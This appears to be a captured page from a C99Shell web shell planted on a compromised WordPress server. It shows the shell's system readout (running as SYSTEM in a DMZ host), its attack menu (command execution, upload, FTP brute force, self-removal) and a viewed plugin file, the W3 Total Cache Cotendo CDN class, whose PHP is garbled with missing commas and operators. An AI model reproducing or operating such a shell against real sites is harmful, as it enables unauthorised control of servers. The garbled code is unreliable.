!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\w3-total-cache\lib\W3\Cdn\Mirror\   drwxrwxrwx
Free 3.26 GB of 39.52 GB (8.25%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Cotendo.php (3.62 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * W3 CDN Netdna Class
 */
if (!defined('ABSPATH')) {
    die();
}

define('W3TC_CDN_MIRROR_COTENDO_WSDL''https://api.cotendo.net/cws?wsdl');
define('W3TC_CDN_MIRROR_COTENDO_ENDPOINT''http://api.cotendo.net/cws?ver=1.0');
define('W3TC_CDN_MIRROR_COTENDO_NAMESPACE''http://api.cotendo.net/');

w3_require_once(W3TC_LIB_W3_DIR '/Cdn/Mirror.php');

/**
 * Class W3_Cdn_Mirror_Cotendo
 */
class W3_Cdn_Mirror_Cotendo extends W3_Cdn_Mirror {
    
/**
     * PHP5 Constructor
     *
     * @param array $config
     */
    
function __construct($config = array()) {
        
$config array_merge(array(
            
'username' => '',
            
'password' => '',
            
'zones' => array(),
        ), 
$config);

        
parent::__construct($config);
    }

    
/**
     * Purges remote files
     *
     * @param array $files
     * @param array $results
     * @return boolean
     */
    
function purge($files, &$results) {
        if (empty(
$this->_config['username'])) {
            
$results $this->_get_results($filesW3TC_CDN_RESULT_HALT__('Empty username.''w3-total-cache'));

            return 
false;
        }

        if (empty(
$this->_config['password'])) {
            
$results $this->_get_results($filesW3TC_CDN_RESULT_HALT__('Empty password.''w3-total-cache'));

            return 
false;
        }

        if (empty(
$this->_config['zones'])) {
            
$results $this->_get_results($filesW3TC_CDN_RESULT_HALT__('Empty zones list.''w3-total-cache'));

            return 
false;
        }

        
w3_require_once(W3TC_LIB_NUSOAP_DIR '/nusoap.php');

        
$client = new nusoap_client(
            
W3TC_CDN_MIRROR_COTENDO_WSDL,
            
'wsdl'
        
);

        
$error $client->getError();

        if (
$error) {
            
$results $this->_get_results($filesW3TC_CDN_RESULT_HALTsprintf(__('Constructor error (%s).''w3-total-cache'), $error));

            return 
false;
        }

        
$client->authtype 'basic';
        
$client->username $this->_config['username'];
        
$client->password $this->_config['password'];
        
$client->forceEndpoint W3TC_CDN_MIRROR_COTENDO_ENDPOINT;

        foreach ((array) 
$this->_config['zones'] as $zone) {
            
$expressions = array();

            foreach (
$files as $file) {
                
$remote_path $file['remote_path'];
                
$expressions[] = '/' $remote_path;
            }

            
$expression implode("\n"$expressions);

            
$params = array(
                
'cname' => $zone,
                
'flushExpression' => $expression,
                
'flushType' => 'hard',
            );

            
$client->call('doFlush'$paramsW3TC_CDN_MIRROR_COTENDO_NAMESPACE);

            if (
$client->fault) {
                
$results $this->_get_results($filesW3TC_CDN_RESULT_HALT__('Invalid response.''w3-total-cache'));

                return 
false;
            }

            
$error $client->getError();

            if (
$error) {
                
$results $this->_get_results($filesW3TC_CDN_RESULT_HALTsprintf(__('Unable to purge (%s).''w3-total-cache'), $error));

                return 
false;
            }
        }

        
$results $this->_get_results($filesW3TC_CDN_RESULT_OK__('OK''w3-total-cache'));

        return 
true;
    }

    
/**
     * Purges CDN completely
     * @param $results
     * @return bool
     */
    
function purge_all(&$results) {
        return 
$this->purge(array(array('local_path'=>'*''remote_path'=> '*')), $results);
    }

    
/**
     * If CDN supports path of type folder/*
     * @return bool
     */
    
function supports_folder_asterisk() {
        return 
true;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--